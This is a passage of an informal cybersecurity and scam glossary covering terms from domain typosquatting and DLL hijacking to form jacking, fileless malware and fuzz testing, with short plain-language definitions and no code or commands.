Domain Typo Squatting – These are web addresses that have been deliberately miss-spelled and to look like the legitimate web address (see my blog on this subject).
There are various types of Domain Typo Sqatting:
- Misconfigured or illegitimate typosquat domains are described as ones that have not been properly configured and show directory indexes or HTML error messages. Other types of sites that fall under this category are ones that promote content related to the domain name, but not necessarily for the benefit of the orgnanisation.
- Non-malicious typosquat domains are ones that are designed hurt the brand of the company.
- Redirects, which are unfortunately the most common. These sites will redirect the visitor to scam sites, unwanted and fake Chrome and Firefox browser extensions, fake program updates that install malware, or tech support scams.
Donation Scam – This is where, for example, a person claiming they have a child, or someone they know, with an illness and need financial assistance. Although many of these claims can be real, there are also an alarming number of people who create fake accounts on donation sites in the hope of scamming people out of money.
Doorstep Scam/Fraud – This involves someone coming to your home and knocking on the door, with the aim of tricking you out of money. There can be added pressure with face-to-face interaction, which can sometimes be more challenging than dealing with phone scams, postal scams and online scams.
Download Attack – An unintentional download of malicious software (malware) onto a users device without their knowledgeable consent. This is often the result of a Malvertising attack.
Drive By Download Attack – This is when a user visits a website and a file download is initiated without the user’s interaction. This technique can be used to distribute unwanted software and malicious programs in the hopes that users will accidentally or mistakenly execute the downloads and get infected. We are finally seeing web browsers implement features to stop this attack.
Dual Use Certificate – This is a digital certificate that is intended for use with both digital signature and data encryption services.
Dynamic Link Library (DLL) – These are extensions of different applications. Any application we use may or may not use certain codes. Such codes are stored in different files and are invoked or loaded into RAM only when the related code is required. Thus, it saves an application file from becoming too big and to prevent resource hogging by the application.
Dynamic Link Library (DLL) Hijacking – This is where an original DLL file is replaced with a fake DLL file containing malicious code. Since DLLs are extensions and necessary to using almost all applications on your machines, they are present on the computer in different folders. There are priorities as to where the operating system looks for DLL files. First, it looks into the same folder as the application folder and then goes searching, based on the priorities set by environment variables of the operating system. Thus if a good.dll file is in SysWOW64 folder and someone places a bad.dll in a folder that has higher priority compared to SysWOW64 folder, the operating system will use the bad.dll file, as it has the same name as the DLL requested by the application. Once in RAM, it can execute the malicious code contained in the file and may compromise your computer or networks.
Eavesdropping – This is the practice of listening, intercepting, or monitoring private communication between users or user groups without their knowledge or permission. See also Wire Tapping.
Edge Computing – This is s a distributed computing paradigm that brings computation and data storage closer to the location where it is needed, to improve response times and save bandwidth. This is particularly relevant in IoT based devices where the information is gathered in the field (particularly for environmental and security sensors) but then has to be sent to a data center (often with some delay in transmission and/or analysis). if some compute power is positioned closer to the point of origin, the data is immediately useful. See also Cloud Computing and Cloud.
Electronic signature – This is the process of applying a mark in electronic form with the intent to sign a data object and is used interchangeably with digital signature.
Elevation of Privilege – This results from giving an attacker authorization permissions beyond those initially granted by the user being attacked (e.g. a user may have low level privileges and the elevation gives administrator privileges). This is often achieved by exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. This is always the result of some form of cyber attack.
Elliptical Curve Cryptography – This is a cryptographic technique that uses an elliptical curve equation to create cryptography keys; keys generated by this theory are much smaller, faster, and efficient, as well! This modern technique keeps the decryption key private, while the encryption key is public. Unlike traditional methods of generating cryptography keys, elliptical curve technique uses discrete algorithms making it difficult to decipher the keys or challenge the keys.
Email Account Compromise (EAC) – This is a highly sophisticated cyber attack in which cyber attackers use various tactics (e.g. password spraying, phishing, malware, to compromise victims’ email accounts, gaining access to legitimate mailboxes. EAC also leads to email fraud. In the case of EAC, there are almost always two victims- the person whose email account got compromised, and the other person who falls for the fraudulent request from the compromised email account
Email Fraud – This is the intentional deception made for personal gain or to damage another individual through email where the attacker uses social engineering to trick or threaten the target to make a fraudulent financial transaction. See also Social Engineering.
Email Header – This is the meta data held within an email. Emails consist of two parts; the readable part and the meta data/headers that deal with the routing of the email called the email headers. The email headers are not normally seen by a user and are typically codes as machine readable format. However, most email clients will allow you to view the headers which are important in tracking down spoofed emails and phishing attacks.
Email Spoofing – This is where an email header is spoofed so that the message seems to originate from someone or somewhere different from the actual source. Email spoofing is a scheme used in both phishing and spam campaigns because users don’t want to open an email if they don’t trust the legitimacy of the source. The purpose of email spoofing is to trick recipients into opening, or even corresponding with a solicitation.
Employment/Training Scams – This type of scam can come under many forms but has the same purpose as any other. Finding a Master degree for less than $199 is very unlikely to happen. People have paid for expensive courses, CV services or simply jobs that don’t exist. People most likely to be targeted by these kinds of scams are aged between 18-24.
Encipher – This is a process to convert plain text to cipher text via a cryptographic system.
Encryption – This is a mathematical/algorithmic method that obscures data’s true form by making it unreadable to anyone who does not know how it was encrypted. Encryption is used in https browser requests, and in securing communications and hardware from data extraction by hackers.
Encrypted DNS – There are various forms of encryption for DNS as follows (see appropriate definitions for details):
- DNS over TLS (DoT)
- DNS over HTTPS (DoH).
End Point – Any device that can connect to a network is termed as “endpoint” from desktops, laptops, tablets, smartphones and, more recently, IoT devices. Endpoints are now exposed to ransomware, phishing, malicious advertisements, software subversion, and other attacks. Not to mention that attackers use zero-day attacks that use previously unidentified vulnerabilities to send malicious programs to endpoint computers.
End Point Protection – This refers to a system for network security management that focuses on network endpoints, or individual devices such as workstations and mobile devices from which a network is accessed. The term also describes specific software packages that address endpoint security including suites of security software provided by many security companies (e.g. AVG, Symantec, McAfee, Kaspersky). Endpoint protection may also be called endpoint security.
Entropy – (or Information entropy) is the average rate at which information is produced by a stochastic source of data. There is a very good WikiPedia page if you want to find out more, but this does get very mathematical. This is often used as a measure of how complex a password is when subject to a brute force attack.
Enumeration Attack – Web applications with password and login authentication typically include several components that interact with the user database: the login window (for obvious reasons), the registration form (to avoid duplication of user names), and the password reset page (to make sure that the corresponding account exists). If Web developers do not implement these features securely enough, attackers may be able to use them to determine if a certain username exists in the database.
Exploit – This refers to a vulnerability, or bug, in software or hardware that can be used by hackers to execute some form of cyber attack.
Exploit Code – This is a computer program that allows attackers to automatically break into a system.
Exploitable Channel – This is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base. An example is a system vulnerability or zero-day.
External Drive – This is a disk drive that typically resides outside of a computer and typically connects to a computer by a USB connection. They can contain both normal HDD/spinning disk drives as well as solid state drives (SSD). They also come in many sizes, can have a completely enclosed disk drive, or is=n some cases a removable disk drive. They are very useful for storing backups as well as extending the storage capacity of PC’s.
External Security Testing – This is security testing conducted from outside the organization’s security perimeter. It is often called Black Box Security Testing as the testers typically don’t have knowledge of the internal network.
Fail Safe – This is the automatic protection of programs and/or processing systems when hardware or software failure is detected. This typically results in a no-harm scenario where all assets remain secured.
Failover – This is a system’s capability to switch over automatically without any warning or human intervention to a redundant or standby information system upon the failure or abnormal termination of the previously active system. Data centres often have a failover data centre in a different location that would not be affected by an outage due to environmental or other, affects. In this way a company can automatically recover processing capabilities with minimal disruption.
Fake prizes / Unexpected Winnings Scams – This is where you receive and email (IM or SMS) claiming that you won a prize, but you don’t remember participating in any contest. You are often required to submit your bank details or a credit/debit card to recover your prize which then results in identity theft or some other fraud.
Fake / Non-existing Goods Scam – This is where you visit a fake webshop and buy goods that are never delivered. Moreover, counterfeit goods sold online are increasing significantly and the majority of goods coming from China, even though the website states it is based in the UK, the US or another country heavily protected from counterfeits.
File-less Malware – This is a form of malware that exists purely in memory (RAM) and does not persist itself through dropping files to a file system or infecting existing files. This is a typical form of infection for routers and embedded systems that do not have a Read/Write filesystem. Normally a simple reboot of the infected system is enough wipe the malware, however this does not close the vulnerability as the malware can just re-infect its host using the same attack vector and vulnerabilities unless these are able to be patched.
File Transfer Protocol (FTP) – This is an internet protocol for transferring files from one computer to another in a network using TCP/ IP. This isb typically unencrypted and has in most contexts has been superseded by ‘Secure File Transfer Protocol” (SFTP) that does use end to end encryption.
Financial Crimes Enforcement Network (FinCEN) – This is a US agency who’s mission is to combat money laundering and connected crimes including terrorism, and to safeguard national security by collecting, analysing and sharing financial intelligence with dozens of intelligence agencies including the DEA, the FBI, the IRS, and the U.S. Secret Service. See their website here.
Firewall – This is often combination of hardware and software that uses a defined set of rules to constrain network traffic and to prevent unauthorised access to or from a network.
Flaw Hypothesis Methodology – This is the system analysis and penetration testing technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized on the basis of the estimated probability that a flaw exists, on the ease of exploiting it, and on the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Fleeceware – This is a form of fraud where you install an app that abuses the ability to offer trial periods to users before their accounts are charged. When a user signs up for an app trial period, they have to manually cancel the trial to avoid being charged. Most users just uninstall apps they don’t like and the majority of app developers take this as a sign that they wish to cancel the trial period without being charged. However some continue to charge the premium subscription charges.
Flooding – This is a Denial of Service attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Forensic Examination – This is the investigation to evaluate, analyse organize, preserve, and document evidence, including digital evidence that helps identify the cause of a cyber incident.
Forensic Specialist – this is a professional who locates, identifies, collects, analyses and examines computer forensic data while preserving the integrity and maintaining a strict chain of custody of information discovered.
Forensically Clean – This describes digital media that is completely and irretrievably wiped of all data, including nonessential and residual data, scanned for malware, and verified completely blank before use.
Form Jacking Fraud – Also known as digital or web skimming, this scam is basically an evolution of ATM skimming. Criminals steal customers’ card details by adding their own code to a company’s website, which means they can see the card information as it’s being entered.
Fraud – In law, fraud is intentional deception to secure unfair or unlawful gain, or to deprive a victim of a legal right. Fraud can violate civil law (i.e., a fraud victim may sue the fraud perpetrator to avoid the fraud or recover monetary compensation), a criminal law (i.e., a fraud perpetrator may be prosecuted and imprisoned by governmental authorities), or it may cause no loss of money, property or legal right but still be an element of another civil or criminal wrong. The purpose of fraud may be monetary gain or other benefits, for example by obtaining a passport, travel document, or driver’s license, or mortgage fraud, where the perpetrator may attempt to qualify for a mortgage by way of false statements.
Free WiFi – This is a wireless network that is normally offered free in Coffee Shops, Hotels and in other public places. There are a number of dangers in using these facilities, but with taking the correct precautions they can be used in relative safety. See our blog post on Using Free and Public WiFi.
Full Backup – This is a backup of all the files that you need to keep as backups. This is typically slow to make, since you are copying a significant amount of data. However it does give you a snapshot in time so that you can recover your files (with additional incremental backups) to the most recent state. See also our blog post of Backing up your data.
Full Disk Encryption – This is the process of encrypting all the data on the hard disk drive, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product. Using this ensures that even if a disk is removed from a system, it will be unreadable without the appropriate decryption keys. All mobile devices should use full disk encryption.
Fuzz Testing – This is an automated testing technique for uncovering programming errors in software. Also called Fuzzing.